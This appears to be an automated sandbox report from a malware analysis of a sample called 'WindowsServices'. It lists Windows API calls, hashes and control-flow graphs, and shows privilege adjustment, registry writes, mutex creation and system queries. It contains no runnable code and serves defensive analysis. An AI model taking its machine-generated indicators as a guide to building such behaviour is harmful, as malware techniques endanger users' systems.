                                                                        • Instruction ID: 387955213cf341242af21f02e85b7fd3331607f5cb7a19bffeb898acdc1f93f5
                                                                        • Opcode Fuzzy Hash: 24ead7c7138b67f3a46476f4c84bfb2031621dddb6359352eea06206daee3e16
                                                                        • Instruction Fuzzy Hash: 997127711183409FC314DF64C88496FBBF8EBC9704F108A2EF6A693291DB79E905CB96
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 00401000: CopyRect.USER32(?,0040E020), ref: 0040100D
                                                                        • _ftol.MSVCRT ref: 00409CF7
                                                                        • _ftol.MSVCRT ref: 00409D0E
                                                                        • _ftol.MSVCRT ref: 00409D2B
                                                                        • GetWindowRect.USER32(?,?), ref: 00409D86
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 00402516
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040253E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040255E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040257E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040259E
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025BE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025DE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 004025FE
                                                                          • Part of subcall function 00402500: CopyRect.USER32(?,0040E020), ref: 0040261E
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 00409DBF
                                                                        • SetCapture.USER32(?), ref: 00409DC9
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Copy$_ftol$Window$Capture
                                                                        • String ID:
                                                                        • API String ID: 1685161017-0
                                                                        • Opcode ID: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction ID: 353ad75620bb99855249955aa37f7dffc4285601670c8d5eecd51fb0f0ccdc6c
                                                                        • Opcode Fuzzy Hash: 4a7094b539b862f338539457f0d8793b4a741916dd4dc3ebb93e6d5d52ff0bfe
                                                                        • Instruction Fuzzy Hash: 1F416DB12187068FC304DF7AC98595BBBE8FBC8704F044A3EB49993381DB74E9098B56
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1505 40a940-40a999 GetWindowRect 1506 40aa54-40aa7e ClientToScreen call 40b08a 1505->1506 1507 40a99f-40a9a0 1505->1507 1509 40aa83-40aabc call 40adcc 1506->1509 1507->1509 1510 40a9a6-40a9a8 1507->1510 1511 40a9b2-40a9e6 call 4052c0 _ftol 1510->1511 1512 40a9aa-40a9ac 1510->1512 1511->1509 1517 40a9ec-40a9f1 1511->1517 1512->1509 1512->1511 1517->1509 1518 40a9f7-40aa4b call 40afbe GetWindowRect call 40afb8 call 405300 SetWindowRgn 1517->1518 1525 40aa4d call 40a440 1518->1525 1526 40aa52 1525->1526 1526->1509
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0040A97F
                                                                        • _ftol.MSVCRT ref: 0040A9D4
                                                                        • GetWindowRect.USER32(?,?), ref: 0040AA11
                                                                        • SetWindowRgn.USER32(?,0040C340,00000001), ref: 0040AA45
                                                                        • ClientToScreen.USER32(?,?), ref: 0040AA5D
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rect$ClientScreen_ftol
                                                                        • String ID:
                                                                        • API String ID: 2665761307-0
                                                                        • Opcode ID: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction ID: a66530a9fee688cda4384b7b61b220c0551d436bf9aef3ce9762855fe69dfb7b
                                                                        • Opcode Fuzzy Hash: b998918826c77febf2a25c4be3886caa5153053d104f383c60fb6be50d5108d4
                                                                        • Instruction Fuzzy Hash: 58413C752047059FC714DF25C98492BB7E9FBC8B04F004A2EF98693790DB38E909CBA6
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000012.00000002.1746539235.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000012.00000002.1746513540.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.000000000040E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746539235.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746651877.0000000000443000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                        • Associated: 00000012.00000002.1746683536.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_18_2_400000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: _ftol$CreatePolygonRegion
                                                                        • String ID:
                                                                        • API String ID: 4272746700-0
                                                                        • Opcode ID: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction ID: bbc22f1e7c48a6dab8c73f5009b7f3ca445a8864c2917b6fdd274eb9f33cd00a
                                                                        • Opcode Fuzzy Hash: 17b7e62d37637a2d73482e15072a4be556ec02c4b51384e8a89ed16f1ffde3de
                                                                        • Instruction Fuzzy Hash: FF5113B5A087029FC300DF25C58491ABBF4FF88750F118A6EF895A2391EB35D925CB86
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:17.6%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:35
                                                                        Total number of Limit Nodes:2
                                                                        execution_graph 743 d7aa15 744 d7aa46 NtQuerySystemInformation 743->744 746 d7aa90 744->746 747 d7a893 748 d7a89d AdjustTokenPrivileges 747->748 750 d7a91b 748->750 751 d7ab92 754 d7abc6 CreateMutexW 751->754 753 d7ac41 754->753 723 d7a67b 724 d7a6ae LookupPrivilegeValueW 723->724 726 d7a6fe 724->726 691 d7aa46 692 d7aaa6 691->692 693 d7aa7b NtQuerySystemInformation 691->693 692->693 694 d7aa90 693->694 695 d7abc6 696 d7abfe CreateMutexW 695->696 698 d7ac41 696->698 727 d7a5e4 728 d7a602 FindCloseChangeNotification 727->728 730 d7a63c 728->730 707 d7a602 708 d7a62e FindCloseChangeNotification 707->708 709 d7a66d 707->709 710 d7a63c 708->710 709->708 731 d7a462 732 d7a486 RegSetValueExW 731->732 734 d7a507 732->734 735 d7a361 737 d7a392 RegQueryValueExW 735->737 738 d7a41b 737->738 715 d7a8ca 716 d7a8f9 AdjustTokenPrivileges 715->716 718 d7a91b 716->718

                                                                        Callgraph

                                                                        • Executed
                                                                        • Not Executed
                                                                        • Opacity -> Relevance
                                                                        • Disassembly available
                                                                        callgraph 0 Function_00FA0AF8 1 Function_00FA0278 74 Function_00FA0C10 1->74 2 Function_00EF026D 3 Function_00D7A2D2 4 Function_00EF066A 5 Function_00D7A5D1 6 Function_00D7A751 7 Function_00D720D0 8 Function_00D7A25E 9 Function_00D7A45C 10 Function_00FA0971 11 Function_00D72458 12 Function_00FA0FF5 13 Function_00EF05E0 14 Function_00EF067F 15 Function_00D7AA46 16 Function_00D7ABC6 17 Function_00D724C5 18 Function_00FA0268 18->74 19 Function_00FA13E8 20 Function_00D72044 21 Function_00D7A140 22 Function_00D7A540 23 Function_00D7AAC0 24 Function_00EF0074 25 Function_00D7A8CA 26 Function_00D7A776 27 Function_00FA06DB 28 Function_00D723F4 29 Function_00FA0A5C 30 Function_00D721F0 31 Function_00EF0648 31->4 32 Function_00D7A2FE 33 Function_00D7247D 34 Function_00FA0BD0 35 Function_00D7A67B 36 Function_00EF05C1 37 Function_00D7A078 38 Function_00FA08D5 39 Function_00FA11D5 40 Function_00EF0740 41 Function_00D72264 42 Function_00D72364 43 Function_00D7A5E4 44 Function_00D7A462 45 Function_00D7A361 46 Function_00D7A960 47 Function_00D7A56E 48 Function_00D7AAEE 49 Function_00D7A7EC 50 Function_00EF05D1 51 Function_00D7AA15 52 Function_00D72194 53 Function_00D7A893 54 Function_00FA0B3E 55 Function_00D7A392 56 Function_00D7A812 57 Function_00D7AB92 58 Function_00D72310 59 Function_00D7A99A 60 Function_00D72098 61 Function_00D7A186 62 Function_00D7A486 63 Function_00D72005 64 Function_00D7A005 65 Function_00FA0729 66 Function_00D7A602 67 Function_00D7A20C 68 Function_00D722B4 69 Function_00EF000C 70 Function_00D72430 71 Function_00D7A73F 72 Function_00EF0606 73 Function_00D7A0BE 75 Function_00D723BC 76 Function_00D7213C 77 Function_00D7A23C 78 Function_00EF0001 79 Function_00D7A6AE 80 Function_00D7A02E 81 Function_00FA0080 82 Function_00FA0006 82->1 82->13 82->18 82->72 82->75 83 Function_00EF0710

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 184 d7a893-d7a8f7 188 d7a8fc-d7a90b 184->188 189 d7a8f9 184->189 190 d7a94e-d7a953 188->190 191 d7a90d-d7a92d AdjustTokenPrivileges 188->191 189->188 190->191 194 d7a955-d7a95a 191->194 195 d7a92f-d7a94b 191->195 194->195
                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00D7A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: 167a5f56a4cb0af205b0e73fe35812841d46158cdac51be12d7c86b06deba73c
                                                                        • Instruction ID: 3a9dbb8006a4c09dd6ff018c83b609867e5cbc7bba20e44ea5abc3dcf7270e05
                                                                        • Opcode Fuzzy Hash: 167a5f56a4cb0af205b0e73fe35812841d46158cdac51be12d7c86b06deba73c
                                                                        • Instruction Fuzzy Hash: 9921A3765097809FDB228F25DC44B52BFF4EF16310F0984DAE9858B563E2719918CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 264 d7aa15-d7aa79 266 d7aaa6-d7aaab 264->266 267 d7aa7b-d7aa8e NtQuerySystemInformation 264->267 266->267 268 d7aa90-d7aaa3 267->268 269 d7aaad-d7aab2 267->269 269->268
                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00D7AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: 301ce26d4f11f1a17abbd2e1c2e1dbf49fe210afe5ee8cb4f839e5062ba2bfb2
                                                                        • Instruction ID: 9214acdb0138b9b7e3c2b38ed475113dee621a730882bb370139170ee09db3b2
                                                                        • Opcode Fuzzy Hash: 301ce26d4f11f1a17abbd2e1c2e1dbf49fe210afe5ee8cb4f839e5062ba2bfb2
                                                                        • Instruction Fuzzy Hash: A511AC724093809FDB228B14DC44A92BFF4EF46324F09C4CAE9844B163D265A908CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 293 d7a8ca-d7a8f7 294 d7a8fc-d7a90b 293->294 295 d7a8f9 293->295 296 d7a94e-d7a953 294->296 297 d7a90d-d7a915 AdjustTokenPrivileges 294->297 295->294 296->297 299 d7a91b-d7a92d 297->299 300 d7a955-d7a95a 299->300 301 d7a92f-d7a94b 299->301 300->301
                                                                        APIs
                                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00D7A913
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustPrivilegesToken
                                                                        • String ID:
                                                                        • API String ID: 2874748243-0
                                                                        • Opcode ID: da82a16a042af5d9a48358102a6ed31c8ee3ca1d8ee15f12f5ed8d1a2a0f1e90
                                                                        • Instruction ID: 0110f3bd04ed7ceba9caf5b3d334209a8032cf19699e148d68face34e8830ca5
                                                                        • Opcode Fuzzy Hash: da82a16a042af5d9a48358102a6ed31c8ee3ca1d8ee15f12f5ed8d1a2a0f1e90
                                                                        • Instruction Fuzzy Hash: E31151765002049FDB208F55D944B56FBE4EF44320F08C86ADE498B651E375E858DF72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        APIs
                                                                        • NtQuerySystemInformation.NTDLL ref: 00D7AA81
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: InformationQuerySystem
                                                                        • String ID:
                                                                        • API String ID: 3562636166-0
                                                                        • Opcode ID: db319c710fd23e55118f9d0a8d47cfa3af10ebe0a938c6adf149da8a2b8fbf00
                                                                        • Instruction ID: 90c6b5be29271b09f194558b707ea412f9d9d6d0e470a1df22aa930ef09d7a89
                                                                        • Opcode Fuzzy Hash: db319c710fd23e55118f9d0a8d47cfa3af10ebe0a938c6adf149da8a2b8fbf00
                                                                        • Instruction Fuzzy Hash: C0018F315002009FDB208F09DA88B65FBE0FF58320F08C49ADE8A0A651E375E418DFB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 fa0278-fa02a6 1 fa02a8 call fa0c10 0->1 2 fa02ae-fa02bc 0->2 1->2 3 fa03d8-fa03ec 2->3 4 fa02c2-fa0305 2->4 7 fa03f2-fa046b 3->7 8 fa0475-fa04c8 3->8 22 fa03b9-fa03d2 4->22 7->8 18 fa04ca 8->18 19 fa04cf-fa04e9 8->19 18->19 27 fa04eb-fa0515 19->27 28 fa0520-fa0677 19->28 22->3 23 fa030a-fa0316 22->23 25 fa031c-fa034d 23->25 26 fa0bbd 23->26 37 fa034f-fa0385 25->37 38 fa0390-fa03b3 25->38 32 fa0bc2-fa0c05 26->32 27->28 60 fa06ff-fa0bb8 28->60 61 fa067d-fa06bb 28->61 37->38 38->22 38->32 61->60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1855643584.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_fa0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 935a10b3ea3e5a7da1439b7be985e46773b9b6daa4f5163d5c859bc4011b0a97
                                                                        • Instruction ID: d23e79553e9dfadb4737ed84cfecdcb50adf5422970d0ffecc6e6180bbf59fd0
                                                                        • Opcode Fuzzy Hash: 935a10b3ea3e5a7da1439b7be985e46773b9b6daa4f5163d5c859bc4011b0a97
                                                                        • Instruction Fuzzy Hash: 46B14970A01318CFDB14EF74D954BADB7B2AF49308F1084A9D449AB391DB799E85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 68 fa0268-fa02a6 69 fa02a8 call fa0c10 68->69 70 fa02ae-fa02bc 68->70 69->70 71 fa03d8-fa03ec 70->71 72 fa02c2-fa0305 70->72 75 fa03f2-fa046b 71->75 76 fa0475-fa04c8 71->76 90 fa03b9-fa03d2 72->90 75->76 86 fa04ca 76->86 87 fa04cf-fa04e9 76->87 86->87 95 fa04eb-fa0515 87->95 96 fa0520-fa0677 87->96 90->71 91 fa030a-fa0316 90->91 93 fa031c-fa034d 91->93 94 fa0bbd 91->94 105 fa034f-fa0385 93->105 106 fa0390-fa03b3 93->106 100 fa0bc2-fa0c05 94->100 95->96 128 fa06ff-fa0bb8 96->128 129 fa067d-fa06bb 96->129 105->106 106->90 106->100 129->128
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1855643584.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_fa0000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2k$2k
                                                                        • API String ID: 0-107389494
                                                                        • Opcode ID: 7d4ef0b22bee6ef790028182536d07fe25326ab0bab69160871af02641dc83b2
                                                                        • Instruction ID: ea4d896b86a2f35a668c81712989c92e39bb396815d1b31a5cff7c77700f2c64
                                                                        • Opcode Fuzzy Hash: 7d4ef0b22bee6ef790028182536d07fe25326ab0bab69160871af02641dc83b2
                                                                        • Instruction Fuzzy Hash: 38816B70A01218CFDB14EF74D955BADB7B2AF49308F1084A9D409AB391DF799E85CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 136 d7ab92-d7ac15 140 d7ac17 136->140 141 d7ac1a-d7ac23 136->141 140->141 142 d7ac25 141->142 143 d7ac28-d7ac31 141->143 142->143 144 d7ac33-d7ac57 CreateMutexW 143->144 145 d7ac82-d7ac87 143->145 148 d7ac89-d7ac8e 144->148 149 d7ac59-d7ac7f 144->149 145->144 148->149
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00D7AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: e82165eb6c0ad51d24d0eb0a35662d3232888ae1edbdff6aa0d5cfa0474ea267
                                                                        • Instruction ID: 547190e9c940163dfc6050213713ada61b9d78a7cc5ea9f155db66e10a871a42
                                                                        • Opcode Fuzzy Hash: e82165eb6c0ad51d24d0eb0a35662d3232888ae1edbdff6aa0d5cfa0474ea267
                                                                        • Instruction Fuzzy Hash: 6C3193B55093806FE712CB25DD49B96BFF8EF06314F08849AE984CF292D375A909C772
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 152 d7a361-d7a3cf 155 d7a3d4-d7a3dd 152->155 156 d7a3d1 152->156 157 d7a3e2-d7a3e8 155->157 158 d7a3df 155->158 156->155 159 d7a3ed-d7a404 157->159 160 d7a3ea 157->160 158->157 162 d7a406-d7a419 RegQueryValueExW 159->162 163 d7a43b-d7a440 159->163 160->159 164 d7a442-d7a447 162->164 165 d7a41b-d7a438 162->165 163->162 164->165
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,E5CF74EA,00000000,00000000,00000000,00000000), ref: 00D7A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 52525a3523cfe79c883b900e01da345d0a8f3409a6a954c8f6d1022958451a3f
                                                                        • Instruction ID: c7494ac19aab5bde0e9c323985a769029074d68ee9f08855a2a1145061a706e5
                                                                        • Opcode Fuzzy Hash: 52525a3523cfe79c883b900e01da345d0a8f3409a6a954c8f6d1022958451a3f
                                                                        • Instruction Fuzzy Hash: AB3184755057405FE721CF15DC84F96BFF8EF45710F08849AE9458B292D364E909CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 169 d7a462-d7a4c3 172 d7a4c5 169->172 173 d7a4c8-d7a4d4 169->173 172->173 174 d7a4d6 173->174 175 d7a4d9-d7a4f0 173->175 174->175 177 d7a527-d7a52c 175->177 178 d7a4f2-d7a505 RegSetValueExW 175->178 177->178 179 d7a507-d7a524 178->179 180 d7a52e-d7a533 178->180 180->179
                                                                        APIs
                                                                        • RegSetValueExW.KERNELBASE(?,00000E24,E5CF74EA,00000000,00000000,00000000,00000000), ref: 00D7A4F8
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: Value
                                                                        • String ID:
                                                                        • API String ID: 3702945584-0
                                                                        • Opcode ID: 3a5451ad4340da212bc97a15d220923f67122716318311230928604f1178beed
                                                                        • Instruction ID: 7865e58605b6693d4a6272999d2bf5a200bdeafa4f0afbd41fd9311b46c289a2
                                                                        • Opcode Fuzzy Hash: 3a5451ad4340da212bc97a15d220923f67122716318311230928604f1178beed
                                                                        • Instruction Fuzzy Hash: 792192B25043806FD7228F15DD44FA7BFB8EF46724F08849AE949CB692D264E948CB71
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 210 d7abc6-d7ac15 213 d7ac17 210->213 214 d7ac1a-d7ac23 210->214 213->214 215 d7ac25 214->215 216 d7ac28-d7ac31 214->216 215->216 217 d7ac33-d7ac3b CreateMutexW 216->217 218 d7ac82-d7ac87 216->218 219 d7ac41-d7ac57 217->219 218->217 221 d7ac89-d7ac8e 219->221 222 d7ac59-d7ac7f 219->222 221->222
                                                                        APIs
                                                                        • CreateMutexW.KERNELBASE(?,?), ref: 00D7AC39
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: CreateMutex
                                                                        • String ID:
                                                                        • API String ID: 1964310414-0
                                                                        • Opcode ID: be7d27db71f05e4ff0bd8608493d3d7285908a46ec04188ae87a8f0f811ad29b
                                                                        • Instruction ID: 86fa5879c1fd60ed8e652227cb835bf7344b3347bf120ec5f7dcb1332f7dbf24
                                                                        • Opcode Fuzzy Hash: be7d27db71f05e4ff0bd8608493d3d7285908a46ec04188ae87a8f0f811ad29b
                                                                        • Instruction Fuzzy Hash: F6218375500200AFE721DF29DD49BA6FBE8EF44324F18C859ED488B741E375E908CA72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 197 d7a67b-d7a6d5 199 d7a6d7 197->199 200 d7a6da-d7a6e0 197->200 199->200 201 d7a6e5-d7a6ee 200->201 202 d7a6e2 200->202 203 d7a731-d7a736 201->203 204 d7a6f0-d7a6f8 LookupPrivilegeValueW 201->204 202->201 203->204 206 d7a6fe-d7a710 204->206 207 d7a712-d7a72e 206->207 208 d7a738-d7a73d 206->208 208->207
                                                                        APIs
                                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00D7A6F6
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: LookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 3899507212-0
                                                                        • Opcode ID: ac00f817536452730f9a7988074a4ca16251cd4c4c087d02129b4975e1112209
                                                                        • Instruction ID: 683a673e49ee6a5e54cfce4bab31d259beeb28dee309c878840f423d601b7212
                                                                        • Opcode Fuzzy Hash: ac00f817536452730f9a7988074a4ca16251cd4c4c087d02129b4975e1112209
                                                                        • Instruction Fuzzy Hash: 2221A1755093805FDB128B65DC95B96BFF8AF06320F0D84DAE984CB293E224D808C772
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 225 d7a392-d7a3cf 227 d7a3d4-d7a3dd 225->227 228 d7a3d1 225->228 229 d7a3e2-d7a3e8 227->229 230 d7a3df 227->230 228->227 231 d7a3ed-d7a404 229->231 232 d7a3ea 229->232 230->229 234 d7a406-d7a419 RegQueryValueExW 231->234 235 d7a43b-d7a440 231->235 232->231 236 d7a442-d7a447 234->236 237 d7a41b-d7a438 234->237 235->234 236->237
                                                                        APIs
                                                                        • RegQueryValueExW.KERNELBASE(?,00000E24,E5CF74EA,00000000,00000000,00000000,00000000), ref: 00D7A40C
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: QueryValue
                                                                        • String ID:
                                                                        • API String ID: 3660427363-0
                                                                        • Opcode ID: 8c325651e64566d7c044c1f62abf6da7a6b20c0b612e975bfd5c297a79386198
                                                                        • Instruction ID: 23a8ca1ec1d3b34d68dfe93b54a9acd686fd8105a252bd385b53ffd8d504cb93
                                                                        • Opcode Fuzzy Hash: 8c325651e64566d7c044c1f62abf6da7a6b20c0b612e975bfd5c297a79386198
                                                                        • Instruction Fuzzy Hash: 0D2190B5600204AFE720CF55DD88FA6F7ECEF44724F08C45AED4A8B651E365E809CA72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 241 d7a960-d7a9c4 243 d7aa07-d7aa0c 241->243 244 d7a9c6-d7a9ce FindCloseChangeNotification 241->244 243->244 245 d7a9d4-d7a9e6 244->245 247 d7aa0e-d7aa13 245->247 248 d7a9e8-d7aa04 245->248 247->248
                                                                        APIs
                                                                        • FindCloseChangeNotification.KERNELBASE(?), ref: 00D7A9CC
                                                                        Memory Dump Source
                                                                        • Source File: 00000015.00000002.1821935566.0000000000D7A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D7A000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_21_2_d7a000_WindowsServices.jbxd
                                                                        Similarity
                                                                        • API ID: ChangeCloseFindNotification
                                                                        • String ID:
